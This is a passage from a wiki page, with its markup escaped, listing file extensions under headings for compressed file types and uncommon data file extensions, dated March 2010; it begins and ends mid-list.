.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
